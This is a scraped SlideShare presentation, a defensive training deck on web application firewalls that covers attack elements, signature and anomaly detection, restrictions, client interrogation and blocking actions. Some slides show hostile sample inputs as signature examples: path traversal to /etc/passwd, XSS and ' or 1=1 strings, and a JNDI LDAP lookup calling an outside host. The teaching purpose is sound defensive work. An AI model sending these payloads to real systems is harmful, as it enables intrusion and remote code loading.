Diese Präsentation wurde erfolgreich gemeldet.
Die SlideShare-Präsentation wird heruntergeladen. ×

The WAF book (Web App Firewall )

Anzeige
Anzeige
Anzeige
Anzeige
Anzeige
Anzeige
Anzeige
Anzeige
Anzeige
Anzeige
Anzeige
Anzeige

Hier ansehen

1 von 222 Anzeige
Anzeige

Weitere Verwandte Inhalte

Weitere von Lior Rotkovitch (12)

Aktuellste (20)

Anzeige

The WAF book (Web App Firewall )

  1. 1. 70295 © “Man’s biggest obstacle is he himself” LR
  2. 2. 70295 © Practical Defensive Security for Security Engineers Ref: 052921DSMM-TWB-HB-V1.P, SOT:S,B. Web App Firewall By: Lior Rotkovitch Comply to
  3. 3. 70295 © About: Lior Rotkovitch 1. High Tech since 1994 : QA, IT, Pre- Sale security, consulting security 2. New Product Introduction (NPI), for F5 ASM WAF since 2006 3. F5 SIRT, Sr Security Engineer since 2016: PSIRT,CSIRT 4. Content Developer - Since 2000 5. Community project: SIRT.club – promote defensive security. gohitech – leveraging high tech culture. ▪ Email: lior.rotkovitch@gmail.com ▪ Twitter: @rotkovitch ▪ LinkedIn: Lior Rotkovitch ▪ Instagram: L.Rotkovitch
  4. 4. 70295 © 1) Target 2) Attack 3) Security 4) Policy 5) Incidents 6) Architecture 7) Operations 8) Security management 9) Assessment 10) SIRT Comply: Learning objective: • Understand the ecosystem 1,2,3 • Applying security value – 4 • When under attack – 5 • Security design – 6 • WAF SW sustaining – 7 • Security Operations – 8 • Evaluating WAF – 9 • Who is doing what - 10
  5. 5. 70295 © Web Application: The business enabler
  6. 6. 70295 © HTTP Response HTTP Request Web App Paradigm THE WEB TCP/IP – Connection Clients Web Application Request • Protocols • Payload – Headers • User input Response • Protocols • Payload – Headers • App output
  7. 7. 70295 © Clients Router Router Firewall Internet PC Response Request Browser WAF Web App ecosystem – Classic Application Server/s Web Server/s 3 tiers model Perimeter model OPS DEV Database Server/s Data Center - On premises / Appliance ADC Web App
  8. 8. 70295 © DEV.SEC.OPS NF Web Application Unknow User Web Bot Requests Responses ABSTRACTION LAYER/S automated traffic Application/s Request handler/s AAA Mobile app/ {API} Database/s DEV Perimeter/Ingress OPS SIRT Web Site DEVOPS App Mesh Cloud private /public Zone X CI/CD • Microservice • Container • Pods Web App ecosystem - Modern WAF NG Mobile Users Ads/ 3rd party services Partners Valuable User Valuable User SIEM ≈ Analytics ∑ Internet Edge
  9. 9. 70295 © Web app CLOUD App Web app Virtualization –OS/HW INTERNET Hybrid Cloud – Public / Private On Perm – dedicate / shared Application location Multi Cloud Web Server App Server Database Server DATA CENTER CLOUD
  10. 10. 70295 © Micros services Data storage login CP mgmt ID Browse Web applications Web Server App Server Database Server Classic • Monolith Cart D B Pay Request/ Response Manager Zone 1 Zone 2 Classic Vs Modern Modern ▪ Mesh app ▪ Microservices Monomesh o Classic / modern 3rd
  11. 11. 70295 © {API} Web Application ABSTRACTION LAYER/S Application/s Request handler/s AAA Database/s SIEM ≈ { API } { API } { API } Web App Admin Mobile client App Mobile Browser { JSON } { JSON } [Text] { API } { API } Mobile app/ {API} Browser { API } CLI Data Plane API Control Plane API Integration API Deploy API Analytics ∑ API use cases [QS/PD] Reporting API {API}
  12. 12. 70295 © Site Map (app tree) { API } [QS/PD] MS MS {API} {API}
  13. 13. 70295 © HTTP Client Types Device OS HTTP Network Tor Devices: • PC • Laptop • Tablet • Mobile • IoT OS: • Windows • Linux • MAC • Android • Containers HTTP: • Browser • CLI tool • Frameworks • Scripting • Mobile App Networking – exit points • ISP • proxies • VPN • Tor Networking media: • Wire -> Router • WiFi -> Router • Mobile data ISP VPN proxy Clouds WEB
  14. 14. 70295 © Aggregated 21.21k 23.57 36.72k 172.29.46.46 2.75k 3.05 4.08k 192.168.1.14 2.26k 2.51 5.27k 192.168.190.191 2.25k 2.50 3.10k 10.10.1.200 2.23k 2.48 4.64k 10.0.0.138 2.01k 2.23 2.82k 0 20 40 60 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 IP1 IP2 IP3 IP4 IP5 0 500 1000 1500 2000 2500 3000 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 URL / Expected Traffic Footprint Top URL RPS Avr / 21.21k /search.php 2.75k /login.php 2.26k /sell.php 2.25k /user_login.php 2.23k /forgot_pass 2.01k Load % Numbers CPU 70% 0/1/2 Memory 72% 80GB Throughput 35% 11.7Mbps RPS 25% 10k GET / query.php HTTP/1.1 Connection: Keep-Alive Host: sirt.club User-Agent: browser (Java/1.8.0_221) Status: Online Performance: Ideal
  15. 15. 70295 © Hacking for fun and profit all the time
  16. 16. 70295 © Attack status brief Type: • Random • Targeted Random • Targeted Motivation • Fame Fun and Profit • Just because they can • New WAR battlefield Execution: • Vulnerability hunting • DDoS • Brute force • Malware • BotNet • Automation • More… CLIENTS THE WEB
  17. 17. 70295 © Attack Elements HTTP Web Application Database App Servers Web Servers “Attack occurs when: attack agent is sending exploit to execute the vulnerability that resides in the attack surface
  18. 18. 70295 © Web Application HTTP Application/s Request handler/s Database/s Vulnerability Vulnerability – is a software condition (bug) with security implication that create a risk to the application assets Vulnerability examples: • Code • Configuration • Design • No ATF enforcement Vulnerability: root cause security bug Main reasons: • Validation • Functionality • Limitations
  19. 19. 70295 © HTTP Application/s Request handler/s Database/s Attack Surface Attack surface examples: 1. Code – Function, library, URL, Parameter 2. Infrastructure – OS, servers, virtualization, keys, 3. System – hardware, network, devices Vulnerability location Attack Surface – the place where the vulnerability exists. Also refer to the entry point for the exploit or the meeting place between the exploit and the vulnerability. Web Application
  20. 20. 70295 © HTTP Request handler/s Database/s Attack Agent Operate from: • Clouds • Mobiles • PC/ tablet • IoT Request generator tool Attack Agent – the software vehicle that is used to sends the exploit to the attack surface Software Types: • CLI • Browser automation • Client framework Web Application Application/s
  21. 21. 70295 © HTTP Request handler/s Database/s Exploit Actual code that activate the vulnerability Exploit – the code / pattern that activate the vulnerability and allow exploitation of the vulnerability. Exploit types: • POC exploit • Exploitation exploit • Weaponizing exploit – RCE Web Application Application/s
  22. 22. 70295 © HTTP Request handler/s Database/s Attack Vector Attack technique and / or goal Web Application We use the same attack elements for all the attacks. The vector is the technique used to achieve the goal Goals: • Deny service / impact performance – DoS • Extract data from DB – SQLi • Session stealing – XSS • Account take over – brute force Technique: • DoS (floods, load) • SQLi • XSS • Brute force • Etc… Application/s
  23. 23. 70295 © Threat Landscape - Traditional Users / HTTP clients App SRV Web SRV Server/s Database SRV App owner Web Exploits Hacker playground Web Application ▪ SQL injection ▪ Directory traversal ▪ Cross site attack ..;-() ..;-()
  24. 24. 70295 © Threat Landscape - Modern DEVOPS partners NF Mobile Users Ads/ 3rd party services Remote employee Web Bot User Requests Responses ABSTRACTION LAYER Allowed automated traffic Application/s Request handler/s Authorization SIEM ≈ Analytics ∑ Mobile app/ API Database/s DEV OPSSEC INSIDER HACKED PURPOSE BUILD BOTNET Automation - battlefield Cloud ${{:-}j Internet Cloud
  25. 25. 70295 © Web Application HTTP Attack Automation Attack agent automation = Bot / Botnet Exploit automation = scanner Bot = AE automation Attack surface automation = scanner Vulnerability automation = Vulnerability hunting AUTO
  26. 26. 70295 © Attack automation - Botnet – disturbed Exploit pool Bot MASTER Purpose build Hacked Infected App A App B App C App D App A App B App C App D App D App B App C App A App D App C App B App A Site 3 Site 2 Site 1 ©
  27. 27. 70295 © AMO – Attack Modus Operandi App A ▪ Firepower ▪ Scheduler ▪ Parsing results ISP VPN Tor proxy • Impersonating • Multi purpose • Evasions ▪ Infected ▪ Hacked ▪ purpose build ▪ Geolocations ▪ Random ▪ Morphing AV: CAV ▪ Botnet ▪ Hive net ▪ Swarm net E HTTP IP
  28. 28. 70295 © • SQLi • XSS • LFI/ RFI • RCE • CSRF Web Exploits • BF • CS • PS ATO • Floods • Loads DDoS BOT/S BOTNET/S Web Application Attack Surface /s Vulnerabilities Exploit Attack Agent ATTACK AUTOMATION AUTO Summary
  29. 29. 70295 © Attack Traffic Footprint 0 500 1000 1500 2000 2500 3000 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 URL / Top URL RPS Avr / 21.21k /search.php 2.75k /login.php 2.26k /sell.php 2.25k /user_login.php 2.23k /noneexisting 2.01k Attack Elements ▪ Vulnerability ▪ Attack Surface ▪ Attack Agent ▪ Exploit ▪ Attack Vector ▪ Attack Automation GET /search.php?q=../../../../../../etc/passwd HTTP/1.1 Host: sirt.club Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54
  30. 30. 70295 © “Security is only as good as the arsenal you have at your disposal
  31. 31. 70295 © Web Application Force Dude HTTP CI/CD WAF– Web App Firewall ❑ Allow ❑ Monitor ❑ Block *D&P Security WAF *D&P= Detect & Prevent
  32. 32. 70295 © 2. CONTROL PLAIN – SETTINGS 3. REPORTING - VISUALIZATION DATA PLANE – ENGINES 1. DATA PLANE – ENGINES: WEB APPLICATION WEB CLIENTS WAF SECURITY ENGINEER PARSER ENGINE TRAPS ENGINE ENFORCER ENGINE
  33. 33. 70295 © Request engines phases in WAF Application Firewall Engines Parser (entities) Value Verb (Method) GET Protocol HTTP 1.1 URL /index.php User-Agent: Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:007240) Source IP 192.168.1.1 Time 01:32:44 Detections: Signatures - User Agent Python-urllib/2.6 Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:007240) Mozilla/4.0 (Hydra) Prevention action Alarm Block page Reset conn GET / HTTP/1.1 Host: sirt.club User-Agent: Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:007240) Parser Traps Enforcer Web Application
  34. 34. 70295 © https://sirt.club/home/search.php?q=waf&cat=all Protocol: https Host: sirt.club Path: /home/ Object: search.php Query Sting: Parameter name: q Parameter value: cve 2nd Parameter name: cat 2nd Parameter value: all Entities: - URL Protocol: https Host: sirt.club Path /home/ Object search.php Query Sting ? Parameter name q Parameter value waf 2nd Parameter name cat 2nd Parameter value all REQUEST Parser: © Parser engine results
  35. 35. 70295 © POST login.php HTTP/1.1 Host: www.sirt.club Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/* Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 32 Accept-Language: en-US,en;q=0.9,he;q=0.8 Cookie: SESSION=2a59508d7509c6d2c21bbf5b uname=meme&pass=god123 POST REQUEST Post Data, Headers – Entities: WEB CLIENTS WEB APP Entities Host: sirt.club Method: POST HTTP version: 1.1 URL: login.php Content-Length: 32 Content-Type application/x-www-form-urlencoded Param 1 uname Param 1 value meme Param 2 pass Param 2 value god123 POST Request Parsing © • HTTP headers • Post data https://sirt.club/login.php
  36. 36. 70295 © HTTP/1.1 200 OK Date: Sat, 08 Jan 2022 13:53:00 GMT Server: Apache X-Powered-By: PHP/7.4.26 Cache-Control: no-cache, must-revalidate, max-age=0 Connection: Keep-Alive Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 8326 Keep-Alive: timeout=5 Content-Type: text/html; charset=UTF-8 <html lang="en"> <head> <meta http-equiv="X-UA-Compatible" content="IE=Edge"/> <meta charset="UTF-8" /> <title>SIRT Club: Security Incident Response Teams Club</title> <script type="text/javascript"> </script> </head> <body> <div id="logo"> <p> Text </p> </body> </html> Entities Response Status Code HTTP/1.1 200 OK Date: Sat, 08 Jan 2022 13:53:00 GMT Server: Apache X-Powered-By: PHP/7.4.26 Cache-Control: no-cache, must-revalidate, max-age=0 Keep-Alive: timeout=5 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Length: 8326 Response body <HTML> <HEAD> <TITLE></TITLE> </HEAD> <Body> <p>SIRT protectors of the realm</p> </Body> </HTML> HTTP Response Parser WEB CLIENTS WEB APP RESPONSE Payload (headers) Protocol Server output ©
  37. 37. 70295 © TRAPS -> DETECTIONS: Signatures - Pattern matching Anomaly - Aggregation and thresholds Client Interrogation - HTTP client inspection Restrictions - Allow / Block lists Protocol Payload User input @ PARSER - ENTITY ©
  38. 38. 70295 © 1.SIGNATURES 3.RESTRICTIONS 2.ANOMALY 4.CLIENT INTERROGATION WEB CLIENTS ENTITIES DETECTIONS PREVENTION ACTION PROTECTION ELEMENTS (PE) WEB APP Traps Protocol Payload User input Parser Enforcer
  39. 39. 70295 © Definition: Parten matching engine Matching known words / key words on entities • Pros • Powerful pattern matching engine (IPS) • Block know exploits • Virtual patching & Leak prevention • Security visibility – export detection • Cons • False positives • Management time • Consuming resources Signatures Attacks: Web Exploit, Bot UA, SQLi, XSS, LFI,RFI, Command Execution, Predictable Resource etc GET /search.php?q=EXPLOIT HTTP/1.1 Connection: keep-alive Host: sirt.club User-Agent: Mozilla/5.00 Signature example ▪ Informational signature – User agent, defaults, general words ▪ Generic exploits signature – common web exploits ▪ Specific exploit signature – CVE/ real known exploits
  40. 40. 70295 © Parser (entities) Value Verb (Method) GET Protocol HTTP 1.1 URL /query.php User-Agent: Apache-HttpClient/4.5.7 (Java/1.8.0_221) Source IP 192.168.1.1 WAF User Agent signature Python-urllib/2.6 Apache-HttpClient/4.5.7 (Java/1.8.0_221) Mozilla/4.0 (Hydra) Signature: Informational GET / query.php HTTP/1.1 Connection: Keep-Alive Host: sirt.club User-Agent: Apache-HttpClient/4.5.7 (Java/1.8.0_221) SIGNATURES ENTITIES DETECTIONS WEB APP ©
  41. 41. 70295 © POST /submit.php HTTP/1.1 Host: sirt.club Connection: keep-alive User-Agent: Mozilla/5.0 Accept: text/html,application/,*/*; Content-Length: 142 Cookie: SESSION=aafa5676ce60d1b33b58c0dd6de6fa87; {“secret_book”: 6.9, “tlv_book”: [<scripts>alert('lala')<script>]} Signature – POST Data <scripts>alert('lala')<script> <scripts> alert('') <script> ‘ or 1 =1 Parser (entities) Host: sirt.club Method: POST HTTP version: 1.1 URL: submit.php Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Accept: text/html, image/webp, */* POST Data {“my_book”: 1.1, “tlv_book”: [<scripts>alert('lala')<script>]} SIGNATURES Signature - Generic exploits WEB APP
  42. 42. 70295 © Signature – Specific Exploit Application Firewall Parser (entities) Value Verb (Method) GET Protocol HTTP 1.1 URL GUI.php${jndi:ldap://webappz.com} User-Agent: Mozilla/5.00 Source IP 192.168.1.1 Time 01:32:44 CVE signatures /............winntwin.ini ..../..../boot.ini ${jndi:ldap://webappz.com} ${jndi: Prevention action Alert Block page Reset conn GET /GUI.php${jndi:ldap://webappz.com} HTTP/1.1 Host: sirt.club User-Agent: Mozilla/5.00 Web App Application Server/s Web Server/s Database Server/s
  43. 43. 70295 © HTTP/1.1 200 OK Date: Sat, 08 Jan 2024 13:53:00 GMT Server: Apache X-Powered-By: PHP/7.4.26 Cache-Control: no-cache, must-revalidate, max-age=0 Connection: Keep-Alive Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 8326 Keep-Alive: timeout=5 Content-Type: text/html; charset=UTF-8 <html lang="en"> <head> <meta http-equiv="X-UA-Compatible" content="IE=Edge"/> <meta charset="UTF-8" /> <title>SIRT Club: Security Incident Response Teams Club</title> <script type="text/javascript"> </script> </head> <body> <div id="logo"> <p> Text </p> </body> </html> Response Status Code HTTP/1.1 200 OK Date: Sat, 08 Jan 2022 13:53:00 GMT Server: Apache X-Powered-By: PHP/7.4.26 Cache-Control: no-cache, must-revalidate, max-age=0 Keep-Alive: timeout=5 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Length: 8326 Response body <HTML> <HEAD> <TITLE></TITLE> </HEAD> <Body> <p>Page Test </p> </Body> </HTML> Signature - HTTP Response headers WEB CLIENTS RESPONSE Headers Response body Signature – Response Headers Apache/2.1 (Unix) PHP/7.1.2 WEB APP
  44. 44. 70295 © HTTP/1.1 200 OK Date: Sun, 29 May 2022 13:13:13 GMT Server: Apache/2.1 (Unix) PHP/7.1.2 Cache-Control: no-cache, must-revalidate, max-age=0 Keep-Alive: timeout=15, max=99 Connection: Keep-Alive Content-Type: text/html <br> <b>Warning</b>: Supplied argument is not a valid MySQL result resource in <b> /var/htdocs/myapp/ </b> on line <b>9</b><br> <br> <b>Warning</b>: Cannot add header information - headers already sent by (output started at /var/htdocs/myapp/login.php:9) in <b> /var/htdocs/myapp/ </b> on line <b>18</b><br> Parser - Response Response Status Code HTTP/1.1 200 OK Date: Sun, 29 May 2022 13:13:13 GMT Server: Apache/2.1 (Unix) PHP/7.1.2 Cache-Control: no-cache, must-revalidate, max-age=0 Keep-Alive: timeout=5 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Response body <br> <b>Warning</b>: Supplied argument is not a valid MySQL result resource in <b> /var/htdocs/myapp/ </b> on line <b>9</b><br> <br> <b>Warning</b>: Cannot add header information - headers already sent by (output started at /var/htdocs/myapp/login.php:9) in <b> /var/htdocs/myapp/ </b> on line <b>18</b><br> RAW HTML Response Signature – Response Body “Supplied argument is not a valid MySQL result resource in” Signature - HTTP Response Body FORM name="search" action="search.php" method="GET"> <INPUT type=HIDDEN name=""> <INPUT type="text" name="query" size=25 value=""> <INPUT TYPE=submit NAME="" VALUE=“Search"> </FORM></
  45. 45. 70295 © 1.SIGNATURES 3.RESTRICTIONS 2.ANOMALY 4.CLIENT INTERROGATION PROTECTION ELEMENTS (PE) Protocol Payload User input ENTITIES DETECTIONS PREVENTION ACTION Traps Parser Enforcer WEB CLIENTS WEB APP
  46. 46. 70295 © Anomaly • Pros: • Easy to use • Effective automation detection • Very effective in noisy attacks • Clear indication of automation • Cons: • Needs fine tune for each site • Advance usage needs knowledge and experience Anomaly example ▪ Request per second (RPS) ▪ Failed log in (FLI) ▪ Session opening ▪ Other detections : signatures, metachars etc Definition: Data aggregation engine Measure exceeding defined threshold Attacks: Brute force , credential stuffing , application DDoS, floods etc Above attack Below ok
  47. 47. 70295 © Internet IP (Parser ) 5 min 20 min 1 hour AVG 10.0.0.138 50 60 180 192.168.1.1 180 0 0 172.29.44.6 400 350 3000 172.29.46.9 250 100 1000 10.1.1.1 1800 1200 800 192.168.24.24 0 100 150 Aggregated data – Policy limit per IP Source IP: ANY @ 5 Min RPS limit Min 220 Max 280 ANOMALY Detection: Anomaly increase in RPS form IP’s
  48. 48. 70295 © Anomaly – increase in RPS on URL’s Application Firewall Internet URL RPS 5 min 20min 1 hour AVG Sell.php 500 600 1800 Help.php 120 100 100 Login.php 3000 6500 8000 Contact.us.php 1500 1000 800 1800 1800 1800 Promo.page.php 10 100 150 Aggregated data – Policy limit per IP Source IP: ANY @ 5 Min RPS limit Min 220 Max 280 sell.php login.php Contact.php
  49. 49. 70295 © IP (Parser ) Sig count 5 min Sig count 20min Sig count 1H 10.0.0.138 500 600 1800 192.168.1.1 20 50 100 172.29.44.6 0 1 0 172.29.46.9 0 0 4 10.1.1.1 4 4 4 192.168.24.24 1 1 1 Aggregated data – Policy limit: Signatures per IP Source IP: ANY @ 5 Min Max signature from IP / 5min Min 20 Max 80 Post max 150 -> shun for 12 hours ANOMALY Internet Detection: Anomaly increase Sig from IP ©
  50. 50. 70295 © IP (Parser ) Current FLI /5min 60min FLI 10.0.0.138 60 180 192.168.1.1 0 0 172.29.44.6 35 40 172.29.46.9 100 1000 10.1.1.1 1800 3000 192.168.24.24 10 150 Aggregated data – Policy limit: FLI per IP Source IP: ANY @ 5 Min FLI/IP over 5 min limit : Min 300 Max 1000 Internet Detection: Anomaly increase in FLI form IP’s Fail Login Try Again ANOMALY IP X IP Y IP Z
  51. 51. 70295 © Anomaly – increase in FLI from Geo Application Firewall Internet IP IP to GEO Current RPS 10m RPS 10.0.0.138 Country U 60 180 192.168.1.1 Country X 0 0 172.29.44.6 Country Y 350 3000 172.29.46.9 Country W 100 1000 10.1.1.1 Country V 1800 1800 192.168.24.24 Country Z 100 150 Aggregated data – Policy limit per IP Source IP: country @ 5 Min RPS limit Min 300 Max 1000 IP’s
  52. 52. 70295 © 0 2 4 6 8 10 12 14 16 18 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 IP’s/URL’s Anomaly - Fixed Vs Ratio 0 5 10 15 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 IP/URL App 1
  53. 53. 70295 © 1.SIGNATURES 3.RESTRICTIONS 2.ANOMALY 4.CLIENT INTERROGATION PROTECTION ELEMENTS (PE) Protocol Payload User input ENTITIES DETECTIONS PREVENTION ACTION Traps Parser Enforcer WEB CLIENTS WEB APP
  54. 54. 70295 © • Pros: • A powerful and granular allow / deny alerting and enforcement list • Provides a schema for ETF • Provide a schema for user input validation • Holistic security • Cons: • Needs fine tune – false positive • Needs management • Block on first occurrence is limited Hit count then block is the best Restrictions Matching Allow / Block lists Restriction examples: ▪ Characters sets ▪ RFC & evasion ▪ Flow ▪ Structure Definition: structure restriction engine Attacks: SQLi, XSS, directory traversal, evasions etc Structure Allow Schema Block Methods Allow RFC Block Encoding Block Protocol WebSocket Allow Protocol HTTP 1.0 Block
  55. 55. 70295 © Restrictions – size Size Min Chars Max chars GET Param value Min 3 chars Max 130 chars Parser (entities) Value Size - found Verb (Method) GET Protocol HTTP 1.1 Parameter name q Parameter value longlonglonglonglonglonglonglonglonglonglong longlonglonglonglonglonglonglonglonglonglong longlonglonglx00nglonglonglonglonglonglonglo nglong 136 chars Source IP 192.168.1.1 Time 01:32:44 http://sirt.club/search.php?q=longlonglonglonglonglonglonglon glonglonglonglonglonglonglonglonglonglonglonglonglonglonglon glonglonglonglonglonglonglonglonglonglonglong Host: sirt.club User-Agent: Mozilla/5.0 Accept: text/html,application/,*/*; Payload size policy RESTRICTIONS
  56. 56. 70295 © Restrictions – HTTP RFC RFC @ any request Policy – allow/ Deny Header with no value Block Double host header Block HTTP verbs: POST Get HEAD Block Null in request Block Parameter value with ' Block Protocol versions 1.1 Allow Protocol versions 1.0 Block Parser (entities) Value Verb (Method) Head Protocol HTTP 1.0 Parameter name q Parameter value mc’mer Host header 172.29.46.23 SIRT.CLUB Time 11:11:11 Header123 _____ Accept text/html,application/,*/* %00; RESTRICTIONS Options /search.php?q=mc’merHTTP/1.0 Host: SIRT.CLUB User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/237.36 Accept: text/html,application/,*/* %00; Host: 172.29.44.44 Header123:
  57. 57. 70295 © Restrictions – Meta characters Parser (entities) Value Verb (Method) GET Protocol HTTP 1.1 Session D5!8ec55996a207ed Parameter name q Parameter value Mc’dogal Source IP 1.1.1.1 Time 01:11:11 http://sirt.club/search.php?q=Mc’dogal RESTRICTIONS Metachar for Any parameter value Encoding ASCII Policy – allow/ Deny # %35 Allow $ %36 Allow % %37 Allow & %38 Allow ' %39 Deny / %47 Deny < %60 Deny
  58. 58. 70295 © Search Engine name FQDN Count /1 day Google .googlebot.com 150 Bing .msn.com 160 Ask .ask.com 10 GET /coffee HTTP/1.1 Host: sirt.club Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) Connection: close DNS Server rDNS- is the IP in the result match the IP arriving Source IP – x.y.z.z Source IP – Y.Y.Y.Y 1. 2. 3. 5. 4. Restrictions – rDNS query
  59. 59. 70295 © HTTP/1.1 200 OK Date: Mon, 29 May 2023 10:10:10 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Keep-Alive: timeout=15, max=99 Connection: Keep-Alive Content-Type: text/html <br> <p> /var/htdocs/myapp/ </p> <br> Credit cards numbers: <p> 001001001001 </p> <br> <p> 001002001003 </p> <br> <p> 001006001004 </p> <br> <p> 001006001771 </p> <br> HTTP Response sanitation Preventing : • Data leakage • Credentials spilling RESPONSE <p> /var/htdocs/myapp/ </p> <br> Credit cards numbers: <p> user1@email1.com: 123456 </p> <br> <p> user2@email1.com: qwerty </p> <br> <p> goduser1@email1.com: LOL123 </p> <br> <p> uadmin1@email1.com: password </p> <br> REQUEST Pattern Occurrences > 2 Pattern Occurrences > 3 N/A
  60. 60. 70295 © 1.SIGNATURES 3.RESTRICTIONS 2.ANOMALY 4.CLIENT INTERROGATION PROTECTION ELEMENTS (PE) Protocol Payload User input ENTITIES DETECTIONS PREVENTION ACTION Traps Parser Enforcer WEB CLIENTS WEB APP
  61. 61. 70295 © Client Interrogation Who is the client ? 1. Simple bot 2. Full browser bot 3. Full human bot Definition: HTTP client inspection for understating who is the HTTP client • Pros • Helping with identifying bots/ automation • Examining Attack Agent • Works beyond IP level • Powerful with other detection • Cons • Add round trip, delay the load time • Can be tricked • No blocking Types I. CAPTHCA II. Client capabilities L1-3 III. Source ID (SID) Attacks: bot /botnets for any attacks. Automated traffic Attack agents
  62. 62. 70295 © User Browser WAF - CI App First request GET /sell.php GET /sell.php (not verified) Client – interrogation Return interrogation results Forward request HTTP Response (verified) interrogation Tests: • CLI ? • Support JS? • Support cookie ? • Mouse movements ? • Event sequence ? • UA fit resolution ? • Framework ? GET /img.png (verified ) GET /img.png (verified) HTTP Response (verified) HTML rendering interrogation results : If failed – drop / block request if pass – forward Client interrogation – concept
  63. 63. 70295 © Type the words : SIRT#1 AUTO Type the words : SIRT#1 ??!?!?!! SIRT#1 © Human Not human Client interrogation I : CAPTHCA
  64. 64. 70295 © IP:Y IP:X Which AA? IP:A Client interrogation Client interrogation II : Capabilities Only browsers are allowed here CI results Allowed Browser Yes CLI No JS capable Yes Cookie set Yes
  65. 65. 70295 © IP:Y IP:X IP:Z Client interrogation III : SID IP:X SID: 9883 10 RPS IP:X SID: 1253 50 RPS IP:Z SID: 4948 100 RPS IP:Z SID:1151 20 RPS IP:Z SID: 2222 12 RPS IP:Y SID: 2873 0 RPS SID: 9883 SID: 1253 SID: 2873 SID: 1151 SID: 4948 SID: 2222 Measuring IP/SID Binding Client interrogation Who are you ?
  66. 66. 70295 © TRAPS -> DETECTIONS: Signatures - Pattern matching Anomaly - Aggregation and thresholds Client Interrogation - HTTP client inspection Restrictions - Allow / Block lists
  67. 67. 70295 © SIGNATURES RESTRICTIONS ANOMALY CLIENT INTERROGATION ALERT BLOCK LIMIT FOLLOW UP WEB CLIENTS PROTECTION ELEMENTS (PE) Protocol Payload User input ENTITIES DETECTIONS PREVENTION ACTION Traps Parser Enforcer
  68. 68. 70295 © ❑ SMS ❑ Messaging – slack ❑ Email ALERT To: WAF admin ❑ DASHBOARD – ALERT / CRITICAL ❑ GRAPHS – VISUAL ❑ STATISTICS – TABLES ❑ LOGS – REQUEST LOGS Alert – the most basic but the most important. The money time And security visibility feedback loop Browse r User IP Attacker © WAF Reporting (GUI) External alert utility
  69. 69. 70295 © Your traffic is violating the site policy. If this continues, please contact our support 111-111 Block ID: 10ABC TCP FIN / RESET Drop connection Semi blocking: Scrubbing / Stripping / Cloaking Browse r BLOCK This request has been blocked To: End Users © Blocking page
  70. 70. 70295 © • Limiting rate of RPS on specific IP • Limiting RPS on site • Limiting RPS on specific URL • Limiting time • Limiting access – 4 hours ban LIMIT IP q search.php index.php IP • Rate limit on the client side Advantages ▪ Slowdown / Delay attack ▪ Less aggressive then blocking ▪ Typically works on anomalies • Rate limit on the server side
  71. 71. 70295 © Send users to honeypot for inspections Resent browser to main page FOLLOW UP Advantages ▪ Delay attack ▪ Hides blocking actions ▪ Investigating activity 302: HOME Fake app keep them busy Redirect Honeypot
  72. 72. 70295 © Your traffic is violating the site policy. If this continues, please contact our support 111-111 Block ID: 10ABC Browser This request has been blocked Wrong username password, please try again : Login Forgot password Password User: Home | Buy| login| Help Retaliation Not available Home | Buy| login| Help Please try again later Soft Block Hard block FOLLOW UP
  73. 73. 70295 © PARSER ENGINE TRAPS ENGINE ENFORCER ENGINE REQUEST ARRIVE WAF DATA PLANE REQUEST/RESPONSE PROCESS PARSER ENGINE TRAPS ENGINE ENFORCER ENGINE RESPONSE ARRIVE SIGNATURES RESTRICTIONS ANOMALY CLIENT INTERROGATION Protocol Payload User input SIGNATURES RESTRICTIONS ANOMALY CLIENT INTERROGATION Protocol Payload User input ALERT BLOCK LIMIT FOLLOW UP ALERT BLOCK LIMIT FOLLOW UP
  74. 74. 70295 © Traffic visibility to control the users, Foe or Friend *
  75. 75. 70295 © WAF – inline traffic inspector WEB APPLICATION Application/s Request handler/s Database/s Expected Traffic Footprint Attack Traffic Footprint No Services for you WEB APP OWNER ✓ Allow valuable traffic ✓ Stop attack Welcome P D E ©
  76. 76. 70295 © Entity 1.PROTOCOL 2.PAYLOAD 3.USER INPUT Detections 1.SIGNATURES 2.ANOMALY 3.RESTRICTION 4.CLIENT INTERROGATION Prevention 1.ALERT 2.BLOCK 3.LIMITING 4.FOLLOW UP E D P WAF – PE and Rules Rule PROTECTION ELEMENTS (PE) ©
  77. 77. 70295 © Rules Concept PROTOCOL PAYLOAD – HEADERS USER INPUT SIGNATURES ANOMALY RESTRICTIONS CLIENT INTERROGATION ALERT BLOCK LIMIT FOLLOW UP • Detection ENFORCER TRAPS PARSER E D P • Entity • PA user input parameter value Signature SQLi select * from Blocking page
  78. 78. 70295 © WAF policy Policy PE • Entities • Detections • Prevention E D P E D P E D P • Rule • Rule sets Rule Rules Protection elements Protection rule Protection policy
